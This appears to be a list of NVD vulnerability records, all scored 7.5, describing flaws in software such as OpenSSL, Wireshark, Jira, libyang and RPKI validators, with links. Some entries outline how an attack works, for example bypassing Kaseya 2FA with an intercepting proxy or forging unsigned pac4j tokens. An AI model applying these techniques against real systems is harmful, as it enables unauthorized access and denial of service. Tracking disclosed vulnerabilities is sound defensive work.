CVE-2019-15681 LibVNC commit before d01e1bb4246323ba6fcee3b82ef1faa9b1dac82a contains a memory leak (CWE-655) in VNC server code, which allow an attacker to read stack memory and can be abused for information disclosure. Combined with another vulnerability, it can be used to leak stack memory and bypass ASLR. This attack appear to be exploitable via network connectivity. These vulnerabilities have been fixed in commit d01e1bb4246323ba6fcee3b82ef1faa9b1dac82a. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-15681
CVE-2019-18976 An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-18976
CVE-2019-19583 An issue was discovered in Xen through 4.12.x allowing x86 HVM/PVH guest OS users to cause a denial of service (guest OS crash) because VMX VMEntry checks mishandle a certain case. Please see XSA-260 for background on the MovSS shadow. Please see XSA-156 for background on the need for #DB interception. The VMX VMEntry checks do not like the exact combination of state which occurs when #DB in intercepted, Single Stepping is active, and blocked by STI/MovSS is active, despite this being a legitimate state to be in. The resulting VMEntry failure is fatal to the guest. HVM/PVH guest userspace code may be able to crash the guest, resulting in a guest Denial of Service. All versions of Xen are affected. Only systems supporting VMX hardware virtual extensions (Intel, Cyrix, or Zhaoxin CPUs) are affected. Arm and AMD systems are unaffected. Only HVM/PVH guests are affected. PV guests cannot leverage the vulnerability. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-19583
CVE-2019-14888 A vulnerability was found in the Undertow HTTP server in versions before 2.0.28.SP1 when listening on HTTPS. An attacker can target the HTTPS port to carry out a Denial Of Service (DOS) to make the service unavailable on SSL. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-14888
CVE-2020-5258 In affected versions of dojo (NPM package), the deepCopy method is vulnerable to Prototype Pollution. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. This has been patched in versions 1.12.8, 1.13.7, 1.14.6, 1.15.3 and 1.16.2 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-5258
CVE-2020-11080 In nghttp2 before version 1.41.0, the overly large HTTP/2 SETTINGS frame payload causes denial of service. The proof of concept attack involves a malicious client constructing a SETTINGS frame with a length of 14,400 bytes (2400 individual settings entries) over and over again. The attack causes the CPU to spike at 100%. nghttp2 v1.41.0 fixes this vulnerability. There is a workaround to this vulnerability. Implement nghttp2_on_frame_recv_callback callback, and if received frame is SETTINGS frame and the number of settings entries are large (e.g., > 32), then drop the connection. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-11080
CVE-2020-12723 regcomp.c in Perl before 5.30.3 allows a buffer overflow via a crafted regular expression because of recursive S_study_chunk calls. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-12723
CVE-2020-13881 In support.c in pam_tacplus 1.3.8 through 1.5.1, the TACACS+ shared secret gets logged via syslog if the DEBUG loglevel and journald are used. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-13881
CVE-2019-20413 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to impact the application's availability via a Denial of Service (DoS) vulnerability on the UserPickerBrowser.jspa page. The affected versions are before version 7.13.9, and from version 8.0.0 before 8.4.2. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-20413
CVE-2020-14167 The MessageBundleResource resource in Jira Server and Data Center before version 7.13.4, from 8.5.0 before 8.5.5, from 8.8.0 before 8.8.2, and from 8.9.0 before 8.9.1 allows remote attackers to impact the application's availability via an Denial of Service (DoS) vulnerability. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-14167
CVE-2020-11994 Server-Side Template Injection and arbitrary file disclosure on Camel templating components 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-11994
CVE-2020-13933 Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-13933
CVE-2020-14178 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to enumerate project keys via an Information Disclosure vulnerability in the /browse.PROJECTKEY endpoint. The affected versions are before version 7.13.7, from version 8.0.0 before 8.5.8, and from version 8.6.0 before 8.12.0. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-14178
CVE-2020-24265 An issue was discovered in tcpreplay tcpprep v4.3.3. There is a heap buffer overflow vulnerability in MemcmpInterceptorCommon() that can make tcpprep crash and cause a denial of service. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-24265
CVE-2020-24266 An issue was discovered in tcpreplay tcpprep v4.3.3. There is a heap buffer overflow vulnerability in get_l2len() that can make tcpprep crash and cause a denial of service. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-24266
CVE-2019-17566 Apache Batik is vulnerable to server-side request forgery, caused by improper input validation by the "xlink:href" attributes. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-17566
CVE-2020-8285 curl 7.21.0 to and including 7.73.0 is vulnerable to uncontrolled recursion due to a stack overflow issue in FTP wildcard match parsing. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-8285
CVE-2020-29652 A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.0-20201203163018-be400aefbc4c for Go allows remote attackers to cause a denial of service against SSH servers. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-29652
CVE-2020-13949 In Apache Thrift 0.9.3 to 0.13.0, malicious RPC clients could send short messages which would result in a large memory allocation, potentially leading to denial of service. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-13949
CVE-2021-23840 Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-23840
CVE-2021-29262 When starting Apache Solr versions prior to 8.8.2, configured with the SaslZkACLProvider or VMParamsAllAndReadonlyDigestZkACLProvider and no existing security.json znode, if the optional read-only user is configured then Solr would not treat that node as a sensitive path and would allow it to be readable. Additionally, with any ZkACLProvider, if the security.json is already present, Solr will not automatically update the ACLs. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-29262
CVE-2021-29241 CODESYS Gateway 3 before 3.5.16.70 has a NULL pointer dereference that may result in a denial of service (DoS). 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-29241
CVE-2021-29101 ArcGIS GeoEvent Server versions 10.8.1 and below has a read-only directory path traversal vulnerability that could allow an unauthenticated, remote attacker to perform directory traversal attacks and read arbitrary files on the system. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-29101
CVE-2021-28902 In function read_yin_container() in libyang <= v1.0.225, it doesn't check whether the value of retval->ext[r] is NULL. In some cases, it can be NULL, which leads to the operation of retval->ext[r]->flags that results in a crash. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-28902
CVE-2021-28903 A stack overflow in libyang <= v1.0.225 can cause a denial of service through function lyxml_parse_mem(). lyxml_parse_elem() function will be called recursively, which will consume stack space and lead to crash. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-28903
CVE-2021-28904 In function ext_get_plugin() in libyang <= v1.0.225, it doesn't check whether the value of revision is NULL. If revision is NULL, the operation of strcmp(revision, ext_plugins[u].revision) will lead to a crash. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-28904
CVE-2021-28905 In function lys_node_free() in libyang <= v1.0.225, it asserts that the value of node->module can't be NULL. But in some cases, node->module can be null, which triggers a reachable assertion (CWE-617). 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-28905
CVE-2021-22222 Infinite loop in DVB-S2-BB dissector in Wireshark 3.4.0 to 3.4.5 allows denial of service via packet injection or crafted capture file 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-22222
CVE-2021-30120 Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement. The need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless. Detailed description --- During the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-30120
CVE-2021-39113 Affected versions of Atlassian Jira Server and Data Center allow anonymous remote attackers to continue to view cached content even after losing permissions, via a Broken Access Control vulnerability in the allowlist feature. The affected versions are before version 8.13.9, and from version 8.14.0 before 8.18.0. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39113
CVE-2021-3749 axios is vulnerable to Inefficient Regular Expression Complexity 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3749
CVE-2021-3761 Any CA issuer in the RPKI can trick OctoRPKI prior to 1.3.0 into emitting an invalid VRP "MaxLength" value, causing RTR sessions to terminate. An attacker can use this to disable RPKI Origin Validation in a victim network (for example AS 13335 - Cloudflare) prior to launching a BGP hijack which during normal operations would be rejected as "RPKI invalid". Additionally, in certain deployments RTR session flapping in and of itself also could cause BGP routing churn, causing availability issues. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3761
CVE-2021-3807 ansi-regex is vulnerable to Inefficient Regular Expression Complexity 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3807
CVE-2020-12080 A Denial of Service vulnerability has been identified in FlexNet Publisher's lmadmin.exe version 11.16.6. A certain message protocol can be exploited to cause lmadmin to crash. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-12080
CVE-2021-41611 An issue was discovered in Squid 5.0.6 through 5.1.x before 5.2. When validating an origin server or peer certificate, Squid may incorrectly classify certain certificates as trusted. This problem allows a remote server to obtain security trust well improperly. This indication of trust may be passed along to clients, allowing access to unsafe or hijacked services. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-41611
CVE-2021-35654 Vulnerability in the Essbase Administration Services product of Oracle Essbase (component: EAS Console). The supported versions that are affected are Prior to 11.1.2.4.046 and Prior to 21.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Essbase Administration Services. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Essbase Administration Services. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-35654
CVE-2021-43114 FORT Validator versions prior to 1.5.2 will crash if an RPKI CA publishes an X.509 EE certificate. This will lead to RTR clients such as BGP routers to lose access to the RPKI VRP data set, effectively disabling Route Origin Validation. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-43114
CVE-2021-43173 In NLnet Labs Routinator prior to 0.10.2, a validation run can be delayed significantly by an RRDP repository by not answering but slowly drip-feeding bytes to keep the connection alive. This can be used to effectively stall validation. While Routinator has a configurable time-out value for RRDP connections, this time-out was only applied to individual read or write operations rather than the complete request. Thus, if an RRDP repository sends a little bit of data before that time-out expired, it can continuously extend the time it takes for the request to finish. Since validation will only continue once the update of an RRDP repository has concluded, this delay will cause validation to stall, leading to Routinator continuing to serve the old data set or, if in the initial validation run directly after starting, never serve any data at all. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-43173
CVE-2021-43174 NLnet Labs Routinator versions 0.9.0 up to and including 0.10.1, support the gzip transfer encoding when querying RRDP repositories. This encoding can be used by an RRDP repository to cause an out-of-memory crash in these versions of Routinator. RRDP uses XML which allows arbitrary amounts of white space in the encoded data. The gzip scheme compresses such white space extremely well, leading to very small compressed files that become huge when being decompressed for further processing, big enough that Routinator runs out of memory when parsing input data waiting for the next XML element. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-43174
CVE-2021-3908 OctoRPKI does not limit the depth of a certificate chain, allowing for a CA to create children in an ad-hoc fashion, thereby making tree traversal never end. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3908
CVE-2021-3909 OctoRPKI does not limit the length of a connection, allowing for a slowloris DOS attack to take place which makes OctoRPKI wait forever. Specifically, the repository that OctoRPKI sends HTTP requests to will keep the connection open for a day before a response is returned, but does keep drip feeding new bytes to keep the connection alive. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3909
CVE-2021-3910 OctoRPKI crashes when encountering a repository that returns an invalid ROA (just an encoded NUL (\\0) character). 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3910
CVE-2021-42717 ModSecurity 3.x through 3.0.5 mishandles excessively nested JSON objects. Crafted JSON objects with nesting tens-of-thousands deep could result in the web server being unable to service legitimate requests. Even a moderately large (e.g., 300KB) HTTP request can occupy one of the limited NGINX worker processes for minutes and consume almost all of the available CPU on the machine. Modsecurity 2 is similarly vulnerable: the affected versions include 2.8.0 through 2.9.4. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-42717
CVE-2021-41090 Grafana Agent is a telemetry collector for sending metrics, logs, and trace data to the opinionated Grafana observability stack. Prior to versions 0.20.1 and 0.21.2, inline secrets defined within a metrics instance config are exposed in plaintext over two endpoints: metrics instance configs defined in the base YAML file are exposed at `/-/config` and metrics instance configs defined for the scraping service are exposed at `/agent/api/v1/configs/:key`. Inline secrets will be exposed to anyone being able to reach these endpoints. If HTTPS with client authentication is not configured, these endpoints are accessible to unauthenticated users. Secrets found in these sections are used for delivering metrics to a Prometheus Remote Write system, authenticating against a system for discovering Prometheus targets, and authenticating against a system for collecting metrics. This does not apply for non-inlined secrets, such as `*_file` based secrets. This issue is patched in Grafana Agent versions 0.20.1 and 0.21.2. A few workarounds are available. Users who cannot upgrade should use non-inline secrets where possible. Users may also desire to restrict API access to Grafana Agent with some combination of restricting the network interfaces Grafana Agent listens on through `http_listen_address` in the `server` block, configuring Grafana Agent to use HTTPS with client authentication, and/or using firewall rules to restrict external access to Grafana Agent's API. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-41090
CVE-2021-43399 The Yubico YubiHSM YubiHSM2 library 2021.08, included in the yubihsm-shell project, does not properly validate the length of some operations including SSH signing requests, and some data operations received from a YubiHSM 2 device. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-43399
CVE-2021-20373 IBM Db2 9.7, 10.1, 10.5, 11.1, and 11.5 may be vulnerable to an Information Disclosure when using the LOAD utility as under certain circumstances the LOAD utility does not enforce directory restrictions. IBM X-Force ID: 199521. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-20373
CVE-2021-43893 Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-43893
CVE-2021-41500 Incomplete string comparison vulnerability exits in cvxopt.org cvxop <= 1.2.6 in APIs (cvxopt.cholmod.diag, cvxopt.cholmod.getfactor, cvxopt.cholmod.solve, cvxopt.cholmod.spsolve), which allows attackers to conduct Denial of Service attacks by construct fake Capsule objects. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-41500
CVE-2021-23727 This affects the package celery before 5.2.2. It by default trusts the messages and metadata stored in backends (result stores). When reading task metadata from the backend, the data is deserialized. Given that an attacker can gain access to, or somehow manipulate the metadata within a celery backend, they could trigger a stored command injection vulnerability and potentially gain further access to the system. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-23727
CVE-2021-4181 Crash in the Sysdig Event dissector in Wireshark 3.6.0 and 3.4.0 to 3.4.10 allows denial of service via packet injection or crafted capture file 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-4181
CVE-2021-4184 Infinite loop in the BitTorrent DHT dissector in Wireshark 3.6.0 and 3.4.0 to 3.4.10 allows denial of service via packet injection or crafted capture file 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-4184
CVE-2021-4185 Infinite loop in the RTMPT dissector in Wireshark 3.6.0 and 3.4.0 to 3.4.10 allows denial of service via packet injection or crafted capture file 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-4185
CVE-2021-44878 If an OpenID Connect provider supports the "none" algorithm (i.e., tokens with no signature), pac4j v5.3.0 (and prior) does not refuse it without an explicit configuration on its side or for the "idtoken" response type which is not secure and violates the OpenID Core Specification. The "none" algorithm does not require any signature verification when validating the ID tokens, which allows the attacker to bypass the token validation by injecting a malformed ID token using "none" as the value of "alg" key in the header with an empty signature value. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44878
CVE-2020-29050 SphinxSearch in Sphinx Technologies Sphinx through 3.1.1 allows directory traversal (in conjunction with CVE-2019-14511) because the mysql client can be used for CALL SNIPPETS and load_file operations on a full pathname (e.g., a file in the /etc directory). NOTE: this is unrelated to CMUSphinx. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-29050
CVE-2022-24124 The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-24124
CVE-2022-21986 .NET Denial of Service Vulnerability. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-21986
CVE-2022-0391 A flaw was found in Python, specifically within the urllib.parse module. This module helps break Uniform Resource Locator (URL) strings into components. The issue involves how the urlparse method does not sanitize input and allows characters like '\\r' and '\\n' in the URL path. This flaw allows an attacker to input a crafted URL, leading to injection attacks. This flaw affects Python versions prior to 3.10.0b1, 3.9.5, 3.8.11, 3.7.11 and 3.6.14. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0391
CVE-2022-0581 Crash in the CMS protocol dissector in Wireshark 3.6.0 to 3.6.1 and 3.4.0 to 3.4.11 allows denial of service via packet injection or crafted capture file 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0581
CVE-2022-0583 Crash in the PVFS protocol dissector in Wireshark 3.6.0 to 3.6.1 and 3.4.0 to 3.4.11 allows denial of service via packet injection or crafted capture file 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0583
CVE-2022-0586 Infinite loop in RTMPT protocol dissector in Wireshark 3.6.0 to 3.6.1 and 3.4.0 to 3.4.11 allows denial of service via packet injection or crafted capture file 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0586
CVE-2022-21698 client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of `promhttp.InstrumentHandler*` middleware except `RequestsInFlight`; not filter any specific methods (e.g GET) before middleware; pass metric with `method` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown `method`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the `method` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-21698
CVE-2022-23308 valid.c in libxml2 before 2.9.13 has a use-after-free of ID and IDREF attributes. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-23308
CVE-2022-24685 HashiCorp Nomad and Nomad Enterprise 1.x before 1.0.17, 1.1.x before 1.1.12, and 1.2.x before 1.2.6 has Uncontrolled Resource Consumption. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-24685
CVE-2020-36518 jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-36518
CVE-2022-0778 The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0778
CVE-2021-45810 Multiple versions of GlobalProtect-openconnect are affected by incorrect access control in GPService through DBUS, GUI. The way GlobalProtect-Openconnect is set up enables arbitrary users to start a VPN connection to arbitrary servers. By hosting an openconnect compatible server, the attack can redirect the entire host's traffic via their own server. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-45810
CVE-2021-27422 GE UR firmware versions prior to version 8.1x web server interface is supported on UR over HTTP protocol. It allows sensitive information exposure without authentication. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-27422
CVE-2022-0996 A vulnerability was found in the 389 Directory Server that allows expired passwords to access the database to cause improper authentication. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0996
CVE-2022-24757 The Jupyter Server provides the backend (i.e. the core services, APIs, and REST endpoints) for Jupyter web applications. Prior to version 1.15.4, unauthorized actors can access sensitive information from server logs. Anytime a 5xx error is triggered, the auth cookie and other header values are recorded in Jupyter Server logs by default. Considering these logs do not require root access, an attacker can monitor these logs, steal sensitive auth/cookie information, and gain access to the Jupyter server. Jupyter Server version 1.15.4 contains a patch for this issue. There are currently no known workarounds. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-24757
CVE-2022-27192 The Reporting module in Aseco Lietuva document management system DVS Avilys before 2022-03-10 allows unauthorized file download. An unauthenticated attacker can impersonate an administrator by reading administrative files. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-27192
CVE-2022-0315 Insecure Temporary File in GitHub repository horovod/horovod prior to 0.24.0. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0315
CVE-2022-1061 Heap Buffer Overflow in parseDragons in GitHub repository radareorg/radare2 prior to 5.6.8. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-1061
CVE-2022-25568 MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-25568
CVE-2021-43666 A Denial of Service vulnerability exists in mbed TLS 3.0.0 and earlier in the mbedtls_pkcs12_derivation function when an input password's length is 0. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-43666
CVE-2022-25571 Bluedon Information Security Technologies Co.,Ltd Internet Access Detector v1.0 was discovered to contain an information leak which allows attackers to access the contents of the password file via unspecified vectors. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-25571
CVE-2018-25032 zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2018-25032
CVE-2022-27227 In PowerDNS Authoritative Server before 4.4.3, 4.5.x before 4.5.4, and 4.6.x before 4.6.1 and PowerDNS Recursor before 4.4.8, 4.5.x before 4.5.8, and 4.6.x before 4.6.1, insufficient validation of an IXFR end condition causes incomplete zone transfers to be handled as successful transfers. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-27227
CVE-2022-24777 grpc-swift is the Swift language implementation of gRPC, a remote procedure call (RPC) framework. Prior to version 1.7.2, a grpc-swift server is vulnerable to a denial of service attack via a reachable assertion. This is due to incorrect logic when handling GOAWAY frames. The attack is low-effort: it takes very little resources to construct and send the required sequence of frames. The impact on availability is high as the server will crash, dropping all in flight connections and requests. This issue is fixed in version 1.7.2. There are currently no known workarounds. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-24777
CVE-2022-27881 engine.c in slaacd in OpenBSD 6.9 and 7.0 before 2022-02-21 has a buffer overflow triggerable by an IPv6 router advertisement with more than seven nameservers. NOTE: privilege separation and pledge can prevent exploitation. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-27881
CVE-2022-27882 slaacd in OpenBSD 6.9 and 7.0 before 2022-03-22 has an integer signedness error and resultant heap-based buffer overflow triggerable by a crafted IPv6 router advertisement. NOTE: privilege separation and pledge can prevent exploitation. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-27882
CVE-2021-26620 An improper authentication vulnerability leading to information leakage was discovered in iptime NAS2dual. Remote attackers are able to steal important information in the server by exploiting vulnerabilities such as insufficient authentication when accessing the shared folder and changing user’s passwords. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-26620
CVE-2021-3567 A flaw was found in Caribou due to a regression of CVE-2020-25712 fix. An attacker could use this flaw to bypass screen-locking applications that leverage Caribou as an input mechanism. The highest threat from this vulnerability is to system availability. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3567
CVE-2021-44477 GE Gas Power ToolBoxST Version v04.07.05C suffers from an XML external entity (XXE) vulnerability using the DTD parameter entities technique that could result in disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project/template file. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44477
CVE-2022-0988 Delta Electronics DIAEnergie (Version 1.7.5 and prior) is vulnerable to cleartext transmission as the web application runs by default on HTTP. This could allow an attacker to remotely read transmitted information between the client and product. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0988
CVE-2022-26271 74cmsSE v3.4.1 was discovered to contain an arbitrary file read vulnerability via the $url parameter at \\index\\controller\\Download.php. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-26271
CVE-2021-44124 Hiby Music Hiby OS R3 Pro 1.5 and 1.6 is vulnerable to Directory Traversal. The HTTP Server does not have enough input data sanitization when shown data from SD Card, an attacker can navigate through the device's File System over HTTP. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44124
CVE-2022-27658 Under certain conditions, SAP Innovation management - version 2.0, allows an attacker to access information which could lead to information gathering for further exploits and attacks. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-27658
CVE-2021-44581 An SQL Injection vulnerabilty exists in Kreado Kreasfero 1.5 via the id parameter. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44581
CVE-2022-23937 In Wind River VxWorks 6.9 and 7, a specific crafted packet may lead to an out-of-bounds read during an IKE initial exchange scenario. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-23937
CVE-2022-1077 A vulnerability was found in TEM FLEX-1080 and FLEX-1085 1.6.0. It has been declared as problematic. This vulnerability log.cgi of the component Log Handler. A direct request leads to information disclosure of hardware information. The attack can be initiated remotely and does not require any form of authentication. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-1077
CVE-2022-28142 Jenkins Proxmox Plugin 0.6.0 and earlier disables SSL/TLS certificate validation globally for the Jenkins controller JVM when configured to ignore SSL/TLS issues. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-28142
CVE-2021-44081 A buffer overflow vulnerability exists in the AMF of open5gs 2.1.4. When the length of MSIN in Supi exceeds 24 characters, it leads to AMF denial of service. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-44081
CVE-2022-25347 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) is vulnerable to path traversal attacks, which may allow an attacker to write arbitrary files to locations on the file system. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-25347
CVE-2022-26948 The Archer RSS feed integration for Archer 6.x through 6.9 SP1 (6.9.1.0) is affected by an insecure credential storage vulnerability. A malicious attacker may obtain access to credential information to use it in further attacks. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-26948
CVE-2020-24771 Incorrect access control in NexusPHP 1.5.beta5.20120707 allows unauthorized attackers to access published content. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2020-24771
CVE-2022-25598 Apache DolphinScheduler user registration is vulnerable to Regular express Denial of Service (ReDoS) attacks, Apache DolphinScheduler users should upgrade to version 2.0.5 or higher. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-25598
CVE-2021-39762 In tremolo, there is a possible out of bounds read due to an integer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-210625816 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-39762
